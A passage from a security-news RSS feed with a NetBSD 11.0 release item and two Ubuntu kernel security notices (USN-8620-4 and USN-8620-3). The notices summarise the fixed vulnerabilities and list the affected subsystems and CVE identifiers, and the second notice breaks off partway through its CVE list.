<guid isPermaLink="true">https://tsecurity.de/de/3698781/unix-server/bsd-release-netbsd-110/</guid>
<pubDate>Mon, 03 Aug 2026 00:13:07 +0200</pubDate>
<content:encoded><![CDATA[The DistroWatch news feed is brought to you by <a href="https://www.tuxedocomputers.com/">TUXEDO COMPUTERS</a>.  The NetBSD project has announced the release of NetBSD 11.0, the 19th major release of the highly portable operating system. The new version includes a port to the RISC-V architecture, better Linux compatibility, and a virt68k port. "New port to the RISC-V processor architecture. NetBSD 11.0 is the....]]></content:encoded>
</item>
<item>
<title><![CDATA[USN-8620-4: Linux kernel (Intel IoTG) vulnerabilities]]></title>
<description><![CDATA[Maxim Suhanov discovered that the NTFS file system implementation in the
Linux kernel did not properly validate file name length in certain
situations, leading to an out-of-bounds read. An attacker could use this to
construct a malicious NTFS image that, when mounted and operated on, could
expose...]]></description>
<link>https://tsecurity.de/de/3698757/unix-server/usn-8620-4-linux-kernel-intel-iotg-vulnerabilities/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3698757/unix-server/usn-8620-4-linux-kernel-intel-iotg-vulnerabilities/</guid>
<pubDate>Mon, 03 Aug 2026 00:13:04 +0200</pubDate>
<content:encoded><![CDATA[Maxim Suhanov discovered that the NTFS file system implementation in the
Linux kernel did not properly validate file name length in certain
situations, leading to an out-of-bounds read. An attacker could use this to
construct a malicious NTFS image that, when mounted and operated on, could
expose sensitive information (kernel memory). (CVE-2023-45896)

It was discovered that some AMD processors did not properly clear data in
the floating point divider unit during speculative execution. A local
attacker could use this to expose sensitive information. (CVE-2025-54505)

It was discovered that some AMD Zen 2 processors did not properly isolate
shared resources in the operation cache. A local attacker could possibly
use this issue to corrupt instructions executed at a higher privilege
level, resulting in privilege escalation. (CVE-2025-54518)

Several security issues were discovered in the Linux kernel.
An attacker could possibly use these to compromise the system.
This update corrects flaws in the following subsystems:
  - ARM32 architecture;
  - ARM64 architecture;
  - MIPS architecture;
  - PowerPC architecture;
  - S390 architecture;
  - x86 architecture;
  - Block layer subsystem;
  - Cryptographic API;
  - ACPI drivers;
  - ATM drivers;
  - Drivers core;
  - Power management core;
  - DRBD Distributed Replicated Block Device drivers;
  - RNBD block device driver;
  - Bluetooth drivers;
  - Bus devices;
  - Character device driver;
  - TPM device driver;
  - Clocksource drivers;
  - Data acquisition framework and drivers;
  - CPU frequency scaling framework;
  - CPU idle management framework;
  - Hardware crypto device drivers;
  - DMA engine subsystem;
  - Arm Firmware Framework for ARMv8-A(FFA);
  - EFI core;
  - GPIO subsystem;
  - GPU drivers;
  - HID subsystem;
  - Hardware monitoring drivers;
  - I2C subsystem;
  - IIO subsystem;
  - IIO ADC drivers;
  - InfiniBand drivers;
  - Input Device (Miscellaneous) drivers;
  - IOMMU subsystem;
  - Mailbox framework;
  - Multiple devices driver;
  - Media drivers;
  - MediaTek SMI driver;
  - NVIDIA Tegra memory controller driver;
  - Multifunction device drivers;
  - IBM Advanced System Management driver;
  - MMC subsystem;
  - MTD block device drivers;
  - Network drivers;
  - Ethernet bonding driver;
  - Mellanox network drivers;
  - Microsoft Azure Network Adapter (MANA) driver;
  - STMicroelectronics network drivers;
  - MediaTek network drivers;
  - Near Field Communication (NFC) drivers;
  - NTB driver;
  - NVDIMM (Non-Volatile Memory Device) drivers;
  - NVME drivers;
  - PCI subsystem;
  - Pin controllers subsystem;
  - x86 platform drivers;
  - Broadcom BCM2835 power domain driver;
  - Power supply drivers;
  - RapidIO drivers;
  - Remote Processor subsystem;
  - RPMSG subsystem;
  - SCSI subsystem;
  - Freescale SoC drivers;
  - Texas Instruments SoC drivers;
  - SPI subsystem;
  - Greybus lights staging drivers;
  - Media staging drivers;
  - Realtek RTL8723BS SDIO drivers;
  - SM750 framebuffer staging driver;
  - TCM subsystem;
  - TTY drivers;
  - UFS subsystem;
  - Cadence USB3 driver;
  - USB Device Class drivers;
  - ULPI bus;
  - USB core drivers;
  - DesignWare USB2 driver;
  - USB Gadget drivers;
  - USB Host Controller drivers;
  - Mustek MDC800 USB digital camera driver;
  - USB YUREX driver;
  - Renesas USBHS Controller drivers;
  - Framebuffer layer;
  - Xen hypervisor drivers;
  - File systems infrastructure;
  - BTRFS file system;
  - Ceph distributed file system;
  - EROFS file system;
  - Ext4 file system;
  - F2FS file system;
  - FAT file system;
  - FUSE (File system in Userspace);
  - GFS2 file system;
  - HFS+ file system;
  - JFS file system;
  - Network file system (NFS) server daemon;
  - NILFS2 file system;
  - File system notification infrastructure;
  - NTFS3 file system;
  - OCFS2 file system;
  - Proc file system;
  - Pstore file system;
  - Diskquota system;
  - SMB network file system;
  - SquashFS file system;
  - UDF file system;
  - XFS file system;
  - Audit subsystem;
  - RAS (Reliability, Availability, Serviceability) subsystem;
  - Software nodes and device properties;
  - Memory Management;
  - KVM subsystem;
  - Memory management;
  - PPP protocol drivers and compressors;
  - Linux Security Modules (LSM) Framework;
  - Network traffic control;
  - Bluetooth subsystem;
  - MAC80211 subsystem;
  - Netfilter;
  - IP tunnels definitions;
  - Tracing infrastructure;
  - User-space API (UAPI);
  - io_uring subsystem;
  - BPF subsystem;
  - Control group (cgroup);
  - Kernel fork() syscall;
  - Kernel futex primitives;
  - Kernel kexec() syscall;
  - Kernel module support;
  - Scheduler infrastructure;
  - Cryptographic library;
  - KASAN memory debugging framework;
  - Asynchronous Transfer Mode (ATM) subsystem;
  - B.A.T.M.A.N. meshing protocol;
  - Ethernet bridge;
  - CAIF protocol;
  - CAN network layer;
  - Ceph Core library;
  - Networking core;
  - Distributed Switch Architecture;
  - IPv4 networking;
  - IPv6 networking;
  - XFRM subsystem;
  - L2TP protocol;
  - Management Component Transport Protocol (MCTP);
  - Multipath TCP;
  - NCSI (Network Controller Sideband Interface) driver;
  - NFC subsystem;
  - Open vSwitch;
  - Phonet protocol;
  - Qualcomm IPC Router (QRTR);
  - RDS protocol;
  - RF switch subsystem;
  - Rose network layer;
  - RxRPC session sockets;
  - SCTP protocol;
  - SMC sockets;
  - Stream parser;
  - Sun RPC protocol;
  - TIPC protocol;
  - TLS protocol;
  - Unix domain sockets;
  - VMware vSockets driver;
  - Wireless networking;
  - X.25 network layer;
  - eXpress Data Path;
  - AppArmor security module;
  - Simplified Mandatory Access Control Kernel framework;
  - ALSA framework;
  - FireWire sound drivers;
  - HD-audio driver;
  - AudioScience HPI driver;
  - Creative Sound Blaster X-Fi driver;
  - AMD SoC Alsa drivers;
  - SoC audio core drivers;
  - STI ASoC drivers;
  - USB sound devices;
(CVE-2022-49803, CVE-2022-49961, CVE-2022-50073, CVE-2022-50116,
CVE-2022-50552, CVE-2023-52682, CVE-2023-52737, CVE-2023-53545,
CVE-2023-53596, CVE-2023-53629, CVE-2024-27389, CVE-2024-35865,
CVE-2024-36898, CVE-2024-36922, CVE-2024-41079, CVE-2024-46715,
CVE-2024-46770, CVE-2024-47809, CVE-2024-50012, CVE-2024-53221,
CVE-2024-56557, CVE-2024-56584, CVE-2024-56657, CVE-2024-56719,
CVE-2024-56727, CVE-2025-21712, CVE-2025-21739, CVE-2025-21863,
CVE-2025-22107, CVE-2025-23141, CVE-2025-37786, CVE-2025-38006,
CVE-2025-38105, CVE-2025-38192, CVE-2025-38250, CVE-2025-38562,
CVE-2025-38626, CVE-2025-38659, CVE-2025-38710, CVE-2025-39748,
CVE-2025-39764, CVE-2025-40005, CVE-2025-40016, CVE-2025-40103,
CVE-2025-40323, CVE-2025-68206, CVE-2025-68239, CVE-2025-68256,
CVE-2025-68307, CVE-2025-68358, CVE-2025-71150, CVE-2025-71161,
CVE-2025-71221, CVE-2025-71232, CVE-2025-71233, CVE-2025-71235,
CVE-2025-71236, CVE-2025-71237, CVE-2025-71238, CVE-2025-71239,
CVE-2025-71265, CVE-2025-71266, CVE-2025-71267, CVE-2025-71274,
CVE-2025-71287, CVE-2025-71292, CVE-2025-71304, CVE-2026-23031,
CVE-2026-23066, CVE-2026-23100, CVE-2026-23113, CVE-2026-23141,
CVE-2026-23157, CVE-2026-23169, CVE-2026-23204, CVE-2026-23220,
CVE-2026-23221, CVE-2026-23222, CVE-2026-23227, CVE-2026-23228,
CVE-2026-23229, CVE-2026-23234, CVE-2026-23235, CVE-2026-23236,
CVE-2026-23237, CVE-2026-23238, CVE-2026-23241, CVE-2026-23242,
CVE-2026-23243, CVE-2026-23253, CVE-2026-23266, CVE-2026-23270,
CVE-2026-23277, CVE-2026-23279, CVE-2026-23281, CVE-2026-23286,
CVE-2026-23289, CVE-2026-23290, CVE-2026-23291, CVE-2026-23293,
CVE-2026-23296, CVE-2026-23298, CVE-2026-23300, CVE-2026-23303,
CVE-2026-23304, CVE-2026-23307, CVE-2026-23312, CVE-2026-23318,
CVE-2026-23324, CVE-2026-23335, CVE-2026-23336, CVE-2026-23339,
CVE-2026-23340, CVE-2026-23352, CVE-2026-23356, CVE-2026-23357,
CVE-2026-23359, CVE-2026-23362, CVE-2026-23365, CVE-2026-23367,
CVE-2026-23368, CVE-2026-23370, CVE-2026-23372, CVE-2026-23379,
CVE-2026-23381, CVE-2026-23382, CVE-2026-23388, CVE-2026-23391,
CVE-2026-23392, CVE-2026-23395, CVE-2026-23396, CVE-2026-23397,
CVE-2026-23398, CVE-2026-23399, CVE-2026-23401, CVE-2026-23420,
CVE-2026-23434, CVE-2026-23438, CVE-2026-23439, CVE-2026-23442,
CVE-2026-23444, CVE-2026-23446, CVE-2026-23452, CVE-2026-23454,
CVE-2026-23456, CVE-2026-23457, CVE-2026-23458, CVE-2026-23460,
CVE-2026-23462, CVE-2026-23463, CVE-2026-23474, CVE-2026-31393,
CVE-2026-31396, CVE-2026-31399, CVE-2026-31400, CVE-2026-31405,
CVE-2026-31407, CVE-2026-31408, CVE-2026-31409, CVE-2026-31411,
CVE-2026-31415, CVE-2026-31416, CVE-2026-31417, CVE-2026-31421,
CVE-2026-31422, CVE-2026-31423, CVE-2026-31424, CVE-2026-31425,
CVE-2026-31427, CVE-2026-31428, CVE-2026-31433, CVE-2026-31446,
CVE-2026-31447, CVE-2026-31450, CVE-2026-31452, CVE-2026-31454,
CVE-2026-31455, CVE-2026-31464, CVE-2026-31466, CVE-2026-31467,
CVE-2026-31469, CVE-2026-31473, CVE-2026-31476, CVE-2026-31480,
CVE-2026-31483, CVE-2026-31485, CVE-2026-31489, CVE-2026-31494,
CVE-2026-31495, CVE-2026-31497, CVE-2026-31498, CVE-2026-31507,
CVE-2026-31508, CVE-2026-31509, CVE-2026-31510, CVE-2026-31512,
CVE-2026-31515, CVE-2026-31518, CVE-2026-31521, CVE-2026-31522,
CVE-2026-31523, CVE-2026-31524, CVE-2026-31532, CVE-2026-31540,
CVE-2026-31545, CVE-2026-31546, CVE-2026-31549, CVE-2026-31550,
CVE-2026-31551, CVE-2026-31552, CVE-2026-31555, CVE-2026-31565,
CVE-2026-31570, CVE-2026-31576, CVE-2026-31577, CVE-2026-31578,
CVE-2026-31580, CVE-2026-31581, CVE-2026-31583, CVE-2026-31585,
CVE-2026-31586, CVE-2026-31588, CVE-2026-31590, CVE-2026-31594,
CVE-2026-31596, CVE-2026-31597, CVE-2026-31598, CVE-2026-31599,
CVE-2026-31602, CVE-2026-31603, CVE-2026-31605, CVE-2026-31615,
CVE-2026-31616, CVE-2026-31617, CVE-2026-31618, CVE-2026-31619,
CVE-2026-31622, CVE-2026-31623, CVE-2026-31624, CVE-2026-31625,
CVE-2026-31626, CVE-2026-31627, CVE-2026-31628, CVE-2026-31629,
CVE-2026-31630, CVE-2026-31634, CVE-2026-31642, CVE-2026-31651,
CVE-2026-31656, CVE-2026-31658, CVE-2026-31660, CVE-2026-31661,
CVE-2026-31662, CVE-2026-31664, CVE-2026-31665, CVE-2026-31667,
CVE-2026-31670, CVE-2026-31671, CVE-2026-31672, CVE-2026-31673,
CVE-2026-31674, CVE-2026-31676, CVE-2026-31679, CVE-2026-31680,
CVE-2026-31681, CVE-2026-31683, CVE-2026-31684, CVE-2026-31686,
CVE-2026-31687, CVE-2026-31694, CVE-2026-31695, CVE-2026-31696,
CVE-2026-31697, CVE-2026-31698, CVE-2026-31699, CVE-2026-31701,
CVE-2026-31716, CVE-2026-31720, CVE-2026-31721, CVE-2026-31726,
CVE-2026-31728, CVE-2026-31737, CVE-2026-31738, CVE-2026-31747,
CVE-2026-31748, CVE-2026-31749, CVE-2026-31751, CVE-2026-31752,
CVE-2026-31754, CVE-2026-31755, CVE-2026-31756, CVE-2026-31758,
CVE-2026-31759, CVE-2026-31761, CVE-2026-31762, CVE-2026-31763,
CVE-2026-31770, CVE-2026-31773, CVE-2026-31778, CVE-2026-31780,
CVE-2026-31781, CVE-2026-31788, CVE-2026-43014, CVE-2026-43015,
CVE-2026-43020, CVE-2026-43024, CVE-2026-43026, CVE-2026-43027,
CVE-2026-43028, CVE-2026-43030, CVE-2026-43032, CVE-2026-43035,
CVE-2026-43040, CVE-2026-43041, CVE-2026-43043, CVE-2026-43046,
CVE-2026-43047, CVE-2026-43050, CVE-2026-43051, CVE-2026-43052,
CVE-2026-43054, CVE-2026-43058, CVE-2026-43060, CVE-2026-43061,
CVE-2026-43062, CVE-2026-43065, CVE-2026-43066, CVE-2026-43068,
CVE-2026-43069, CVE-2026-43074, CVE-2026-43075, CVE-2026-43076,
CVE-2026-43079, CVE-2026-43080, CVE-2026-43085, CVE-2026-43089,
CVE-2026-43093, CVE-2026-43098, CVE-2026-43099, CVE-2026-43103,
CVE-2026-43104, CVE-2026-43105, CVE-2026-43110, CVE-2026-43111,
CVE-2026-43112, CVE-2026-43113, CVE-2026-43123, CVE-2026-43124,
CVE-2026-43130, CVE-2026-43132, CVE-2026-43133, CVE-2026-43134,
CVE-2026-43135, CVE-2026-43136, CVE-2026-43139, CVE-2026-43140,
CVE-2026-43141, CVE-2026-43145, CVE-2026-43147, CVE-2026-43148,
CVE-2026-43149, CVE-2026-43152, CVE-2026-43156, CVE-2026-43158,
CVE-2026-43159, CVE-2026-43163, CVE-2026-43168, CVE-2026-43171,
CVE-2026-43180, CVE-2026-43182, CVE-2026-43183, CVE-2026-43184,
CVE-2026-43187, CVE-2026-43190, CVE-2026-43194, CVE-2026-43196,
CVE-2026-43200, CVE-2026-43202, CVE-2026-43203, CVE-2026-43205,
CVE-2026-43206, CVE-2026-43207, CVE-2026-43209, CVE-2026-43211,
CVE-2026-43218, CVE-2026-43223, CVE-2026-43225, CVE-2026-43226,
CVE-2026-43227, CVE-2026-43230, CVE-2026-43231, CVE-2026-43232,
CVE-2026-43233, CVE-2026-43236, CVE-2026-43241, CVE-2026-43242,
CVE-2026-43246, CVE-2026-43251, CVE-2026-43255, CVE-2026-43257,
CVE-2026-43261, CVE-2026-43262, CVE-2026-43264, CVE-2026-43266,
CVE-2026-43268, CVE-2026-43269, CVE-2026-43270, CVE-2026-43273,
CVE-2026-43275, CVE-2026-43277, CVE-2026-43279, CVE-2026-43281,
CVE-2026-43283, CVE-2026-43287, CVE-2026-43289, CVE-2026-43291,
CVE-2026-43295, CVE-2026-43296, CVE-2026-43302, CVE-2026-43312,
CVE-2026-43313, CVE-2026-43314, CVE-2026-43315, CVE-2026-43316,
CVE-2026-43324, CVE-2026-43327, CVE-2026-43328, CVE-2026-43329,
CVE-2026-43333, CVE-2026-43334, CVE-2026-43336, CVE-2026-43339,
CVE-2026-43340, CVE-2026-43342, CVE-2026-43343, CVE-2026-43357,
CVE-2026-43363, CVE-2026-43365, CVE-2026-43370, CVE-2026-43373,
CVE-2026-43380, CVE-2026-43381, CVE-2026-43382, CVE-2026-43386,
CVE-2026-43387, CVE-2026-43405, CVE-2026-43411, CVE-2026-43420,
CVE-2026-43425, CVE-2026-43426, CVE-2026-43427, CVE-2026-43428,
CVE-2026-43429, CVE-2026-43430, CVE-2026-43432, CVE-2026-43439,
CVE-2026-43445, CVE-2026-43449, CVE-2026-43450, CVE-2026-43451,
CVE-2026-43452, CVE-2026-43453, CVE-2026-43458, CVE-2026-43459,
CVE-2026-43466, CVE-2026-43469, CVE-2026-43472, CVE-2026-43473,
CVE-2026-43475, CVE-2026-43476, CVE-2026-43480, CVE-2026-43484,
CVE-2026-43496, CVE-2026-43497, CVE-2026-43502, CVE-2026-45834,
CVE-2026-45835, CVE-2026-45836, CVE-2026-45838, CVE-2026-45839,
CVE-2026-45840, CVE-2026-45841, CVE-2026-45842, CVE-2026-45843,
CVE-2026-45844, CVE-2026-45846, CVE-2026-45847, CVE-2026-45848,
CVE-2026-45852, CVE-2026-45856, CVE-2026-45857, CVE-2026-45860,
CVE-2026-45862, CVE-2026-45864, CVE-2026-45866, CVE-2026-45867,
CVE-2026-45868, CVE-2026-45869, CVE-2026-45870, CVE-2026-45871,
CVE-2026-45873, CVE-2026-45875, CVE-2026-45879, CVE-2026-45883,
CVE-2026-45885, CVE-2026-45890, CVE-2026-45891, CVE-2026-45899,
CVE-2026-45902, CVE-2026-45904, CVE-2026-45911, CVE-2026-45912,
CVE-2026-45915, CVE-2026-45916, CVE-2026-45919, CVE-2026-45920,
CVE-2026-45924, CVE-2026-45935, CVE-2026-45936, CVE-2026-45941,
CVE-2026-45946, CVE-2026-45948, CVE-2026-45954, CVE-2026-45956,
CVE-2026-45958, CVE-2026-45960, CVE-2026-45964, CVE-2026-45965,
CVE-2026-45968, CVE-2026-45969, CVE-2026-45970, CVE-2026-45974,
CVE-2026-45978, CVE-2026-45983, CVE-2026-45984, CVE-2026-45985,
CVE-2026-45986, CVE-2026-45987, CVE-2026-45994, CVE-2026-46002,
CVE-2026-46004, CVE-2026-46006, CVE-2026-46009, CVE-2026-46015,
CVE-2026-46018, CVE-2026-46019, CVE-2026-46022, CVE-2026-46023,
CVE-2026-46024, CVE-2026-46027, CVE-2026-46033, CVE-2026-46037,
CVE-2026-46040, CVE-2026-46044, CVE-2026-46046, CVE-2026-46047,
CVE-2026-46049, CVE-2026-46050, CVE-2026-46051, CVE-2026-46053,
CVE-2026-46062, CVE-2026-46064, CVE-2026-46070, CVE-2026-46072,
CVE-2026-46077, CVE-2026-46080, CVE-2026-46082, CVE-2026-46088,
CVE-2026-46098, CVE-2026-46099, CVE-2026-46101, CVE-2026-46102,
CVE-2026-46107, CVE-2026-46108, CVE-2026-46112, CVE-2026-46120,
CVE-2026-46122, CVE-2026-46123, CVE-2026-46124, CVE-2026-46127,
CVE-2026-46128, CVE-2026-46132, CVE-2026-46133, CVE-2026-46137,
CVE-2026-46146, CVE-2026-46149, CVE-2026-46150, CVE-2026-46151,
CVE-2026-46161, CVE-2026-46163, CVE-2026-46167, CVE-2026-46168,
CVE-2026-46172, CVE-2026-46174, CVE-2026-46177, CVE-2026-46178,
CVE-2026-46184, CVE-2026-46186, CVE-2026-46187, CVE-2026-46189,
CVE-2026-46197, CVE-2026-46198, CVE-2026-46205, CVE-2026-46206,
CVE-2026-46209, CVE-2026-46212, CVE-2026-46214, CVE-2026-46219,
CVE-2026-46220, CVE-2026-46227, CVE-2026-46230, CVE-2026-46231,
CVE-2026-46233, CVE-2026-46234, CVE-2026-46236, CVE-2026-46238,
CVE-2026-46249, CVE-2026-46250, CVE-2026-46253, CVE-2026-46259,
CVE-2026-46267, CVE-2026-46270, CVE-2026-46273, CVE-2026-46274,
CVE-2026-46275, CVE-2026-46285, CVE-2026-46294, CVE-2026-46301,
CVE-2026-46303, CVE-2026-46304, CVE-2026-46307, CVE-2026-46319,
CVE-2026-46328, CVE-2026-52911, CVE-2026-52912, CVE-2026-52914,
CVE-2026-52915, CVE-2026-52916, CVE-2026-52919, CVE-2026-52920,
CVE-2026-52921, CVE-2026-52922, CVE-2026-52925, CVE-2026-52926,
CVE-2026-52931, CVE-2026-52954, CVE-2026-52955, CVE-2026-52957,
CVE-2026-52958, CVE-2026-52962, CVE-2026-52963, CVE-2026-52969,
CVE-2026-52970, CVE-2026-52982, CVE-2026-52984, CVE-2026-52985,
CVE-2026-52986, CVE-2026-52992, CVE-2026-52993, CVE-2026-52995,
CVE-2026-52998, CVE-2026-52999, CVE-2026-53001, CVE-2026-53002,
CVE-2026-53003, CVE-2026-53004, CVE-2026-53006, CVE-2026-53011,
CVE-2026-53012, CVE-2026-53016, CVE-2026-53021, CVE-2026-53022,
CVE-2026-53023, CVE-2026-53037, CVE-2026-53039, CVE-2026-53040,
CVE-2026-53041, CVE-2026-53043, CVE-2026-53045, CVE-2026-53046,
CVE-2026-53047, CVE-2026-53048, CVE-2026-53049, CVE-2026-53050,
CVE-2026-53059, CVE-2026-53060, CVE-2026-53061, CVE-2026-53062,
CVE-2026-53064, CVE-2026-53065, CVE-2026-53068, CVE-2026-53069,
CVE-2026-53071, CVE-2026-53072, CVE-2026-53073, CVE-2026-53074,
CVE-2026-53075, CVE-2026-53077, CVE-2026-53082, CVE-2026-53088,
CVE-2026-53093, CVE-2026-53096, CVE-2026-53112, CVE-2026-53128,
CVE-2026-53130, CVE-2026-53287, CVE-2026-53291, CVE-2026-53294,
CVE-2026-53295, CVE-2026-53296, CVE-2026-53304, CVE-2026-53306,
CVE-2026-53309, CVE-2026-53320, CVE-2026-53369, CVE-2026-53379,
CVE-2026-63860, CVE-2026-63865, CVE-2026-64018, CVE-2026-64032,
CVE-2026-64033, CVE-2026-64034, CVE-2026-64039, CVE-2026-64046,
CVE-2026-64047, CVE-2026-64055, CVE-2026-64056, CVE-2026-64083,
CVE-2026-64084, CVE-2026-64085, CVE-2026-64086, CVE-2026-64087,
CVE-2026-64088, CVE-2026-64089, CVE-2026-64096, CVE-2026-64102,
CVE-2026-64103, CVE-2026-64113, CVE-2026-64114, CVE-2026-64115,
CVE-2026-64125, CVE-2026-64133, CVE-2026-64135, CVE-2026-64153,
CVE-2026-64155, CVE-2026-64164, CVE-2026-64165, CVE-2026-64166,
CVE-2026-64168, CVE-2026-64173, CVE-2026-64174, CVE-2026-64177,
CVE-2026-64178, CVE-2026-64179, CVE-2026-64185, CVE-2026-64218,
CVE-2026-64219, CVE-2026-64220, CVE-2026-64221)]]></content:encoded>
</item>
<item>
<title><![CDATA[USN-8620-3: Linux kernel (Intel IoTG) vulnerabilities]]></title>
<description><![CDATA[Maxim Suhanov discovered that the NTFS file system implementation in the
Linux kernel did not properly validate file name length in certain
situations, leading to an out-of-bounds read. An attacker could use this to
construct a malicious NTFS image that, when mounted and operated on, could
expose...]]></description>
<link>https://tsecurity.de/de/3698758/unix-server/usn-8620-3-linux-kernel-intel-iotg-vulnerabilities/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3698758/unix-server/usn-8620-3-linux-kernel-intel-iotg-vulnerabilities/</guid>
<pubDate>Mon, 03 Aug 2026 00:13:04 +0200</pubDate>
<content:encoded><![CDATA[Maxim Suhanov discovered that the NTFS file system implementation in the
Linux kernel did not properly validate file name length in certain
situations, leading to an out-of-bounds read. An attacker could use this to
construct a malicious NTFS image that, when mounted and operated on, could
expose sensitive information (kernel memory). (CVE-2023-45896)

It was discovered that some AMD processors did not properly clear data in
the floating point divider unit during speculative execution. A local
attacker could use this to expose sensitive information. (CVE-2025-54505)

It was discovered that some AMD Zen 2 processors did not properly isolate
shared resources in the operation cache. A local attacker could possibly
use this issue to corrupt instructions executed at a higher privilege
level, resulting in privilege escalation. (CVE-2025-54518)

Several security issues were discovered in the Linux kernel.
An attacker could possibly use these to compromise the system.
This update corrects flaws in the following subsystems:
  - ARM32 architecture;
  - ARM64 architecture;
  - MIPS architecture;
  - PowerPC architecture;
  - S390 architecture;
  - x86 architecture;
  - Block layer subsystem;
  - Cryptographic API;
  - ACPI drivers;
  - ATM drivers;
  - Drivers core;
  - Power management core;
  - DRBD Distributed Replicated Block Device drivers;
  - RNBD block device driver;
  - Bluetooth drivers;
  - Bus devices;
  - Character device driver;
  - TPM device driver;
  - Clocksource drivers;
  - Data acquisition framework and drivers;
  - CPU frequency scaling framework;
  - CPU idle management framework;
  - Hardware crypto device drivers;
  - DMA engine subsystem;
  - Arm Firmware Framework for ARMv8-A(FFA);
  - EFI core;
  - GPIO subsystem;
  - GPU drivers;
  - HID subsystem;
  - Hardware monitoring drivers;
  - I2C subsystem;
  - IIO subsystem;
  - IIO ADC drivers;
  - InfiniBand drivers;
  - Input Device (Miscellaneous) drivers;
  - IOMMU subsystem;
  - Mailbox framework;
  - Multiple devices driver;
  - Media drivers;
  - MediaTek SMI driver;
  - NVIDIA Tegra memory controller driver;
  - Multifunction device drivers;
  - IBM Advanced System Management driver;
  - MMC subsystem;
  - MTD block device drivers;
  - Network drivers;
  - Ethernet bonding driver;
  - Mellanox network drivers;
  - Microsoft Azure Network Adapter (MANA) driver;
  - STMicroelectronics network drivers;
  - MediaTek network drivers;
  - Near Field Communication (NFC) drivers;
  - NTB driver;
  - NVDIMM (Non-Volatile Memory Device) drivers;
  - NVME drivers;
  - PCI subsystem;
  - Pin controllers subsystem;
  - x86 platform drivers;
  - Broadcom BCM2835 power domain driver;
  - Power supply drivers;
  - RapidIO drivers;
  - Remote Processor subsystem;
  - RPMSG subsystem;
  - SCSI subsystem;
  - Freescale SoC drivers;
  - Texas Instruments SoC drivers;
  - SPI subsystem;
  - Greybus lights staging drivers;
  - Media staging drivers;
  - Realtek RTL8723BS SDIO drivers;
  - SM750 framebuffer staging driver;
  - TCM subsystem;
  - TTY drivers;
  - UFS subsystem;
  - Cadence USB3 driver;
  - USB Device Class drivers;
  - ULPI bus;
  - USB core drivers;
  - DesignWare USB2 driver;
  - USB Gadget drivers;
  - USB Host Controller drivers;
  - Mustek MDC800 USB digital camera driver;
  - USB YUREX driver;
  - Renesas USBHS Controller drivers;
  - Framebuffer layer;
  - Xen hypervisor drivers;
  - File systems infrastructure;
  - BTRFS file system;
  - Ceph distributed file system;
  - EROFS file system;
  - Ext4 file system;
  - F2FS file system;
  - FAT file system;
  - FUSE (File system in Userspace);
  - GFS2 file system;
  - HFS+ file system;
  - JFS file system;
  - Network file system (NFS) server daemon;
  - NILFS2 file system;
  - File system notification infrastructure;
  - NTFS3 file system;
  - OCFS2 file system;
  - Proc file system;
  - Pstore file system;
  - Diskquota system;
  - SMB network file system;
  - SquashFS file system;
  - UDF file system;
  - XFS file system;
  - Audit subsystem;
  - RAS (Reliability, Availability, Serviceability) subsystem;
  - Software nodes and device properties;
  - Memory Management;
  - KVM subsystem;
  - Memory management;
  - PPP protocol drivers and compressors;
  - Linux Security Modules (LSM) Framework;
  - Network traffic control;
  - Bluetooth subsystem;
  - MAC80211 subsystem;
  - Netfilter;
  - IP tunnels definitions;
  - Tracing infrastructure;
  - User-space API (UAPI);
  - io_uring subsystem;
  - BPF subsystem;
  - Control group (cgroup);
  - Kernel fork() syscall;
  - Kernel futex primitives;
  - Kernel kexec() syscall;
  - Kernel module support;
  - Scheduler infrastructure;
  - Cryptographic library;
  - KASAN memory debugging framework;
  - Asynchronous Transfer Mode (ATM) subsystem;
  - B.A.T.M.A.N. meshing protocol;
  - Ethernet bridge;
  - CAIF protocol;
  - CAN network layer;
  - Ceph Core library;
  - Networking core;
  - Distributed Switch Architecture;
  - IPv4 networking;
  - IPv6 networking;
  - XFRM subsystem;
  - L2TP protocol;
  - Management Component Transport Protocol (MCTP);
  - Multipath TCP;
  - NCSI (Network Controller Sideband Interface) driver;
  - NFC subsystem;
  - Open vSwitch;
  - Phonet protocol;
  - Qualcomm IPC Router (QRTR);
  - RDS protocol;
  - RF switch subsystem;
  - Rose network layer;
  - RxRPC session sockets;
  - SCTP protocol;
  - SMC sockets;
  - Stream parser;
  - Sun RPC protocol;
  - TIPC protocol;
  - TLS protocol;
  - Unix domain sockets;
  - VMware vSockets driver;
  - Wireless networking;
  - X.25 network layer;
  - eXpress Data Path;
  - AppArmor security module;
  - Simplified Mandatory Access Control Kernel framework;
  - ALSA framework;
  - FireWire sound drivers;
  - HD-audio driver;
  - AudioScience HPI driver;
  - Creative Sound Blaster X-Fi driver;
  - AMD SoC Alsa drivers;
  - SoC audio core drivers;
  - STI ASoC drivers;
  - USB sound devices;
(CVE-2022-49803, CVE-2022-49961, CVE-2022-50073, CVE-2022-50116,
CVE-2022-50552, CVE-2023-52682, CVE-2023-52737, CVE-2023-53545,
CVE-2023-53596, CVE-2023-53629, CVE-2024-27389, CVE-2024-35865,
CVE-2024-36898, CVE-2024-36922, CVE-2024-41079, CVE-2024-46715,
CVE-2024-46770, CVE-2024-47809, CVE-2024-50012, CVE-2024-53221,
CVE-2024-56557, CVE-2024-56584, CVE-2024-56657, CVE-2024-56719,
CVE-2024-56727, CVE-2025-21712, CVE-2025-21739, CVE-2025-21863,
CVE-2025-22107, CVE-2025-23141, CVE-2025-37786, CVE-2025-38006,
CVE-2025-38105, CVE-2025-38192, CVE-2025-38250, CVE-2025-38562,
CVE-2025-38626, CVE-2025-38659, CVE-2025-38710, CVE-2025-39748,
CVE-2025-39764, CVE-2025-40005, CVE-2025-40016, CVE-2025-40103,
CVE-2025-40323, CVE-2025-68206, CVE-2025-68239, CVE-2025-68256,
CVE-2025-68307, CVE-2025-68358, CVE-2025-71150, CVE-2025-71161,
CVE-2025-71221, CVE-2025-71232, CVE-2025-71233, CVE-2025-71235,
CVE-2025-71236, CVE-2025-71237, CVE-2025-71238, CVE-2025-71239,
CVE-2025-71265, CVE-2025-71266, CVE-2025-71267, CVE-2025-71274,
CVE-2025-71287, CVE-2025-71292, CVE-2025-71304, CVE-2026-23031,
CVE-2026-23066, CVE-2026-23100, CVE-2026-23113, CVE-2026-23141,
CVE-2026-23157, CVE-2026-23169, CVE-2026-23204, CVE-2026-23220,
CVE-2026-23221, CVE-2026-23222, CVE-2026-23227, CVE-2026-23228,
CVE-2026-23229, CVE-2026-23234, CVE-2026-23235, CVE-2026-23236,
CVE-2026-23237, CVE-2026-23238, CVE-2026-23241, CVE-2026-23242,
CVE-2026-23243, CVE-2026-23253, CVE-2026-23266, CVE-2026-23270,
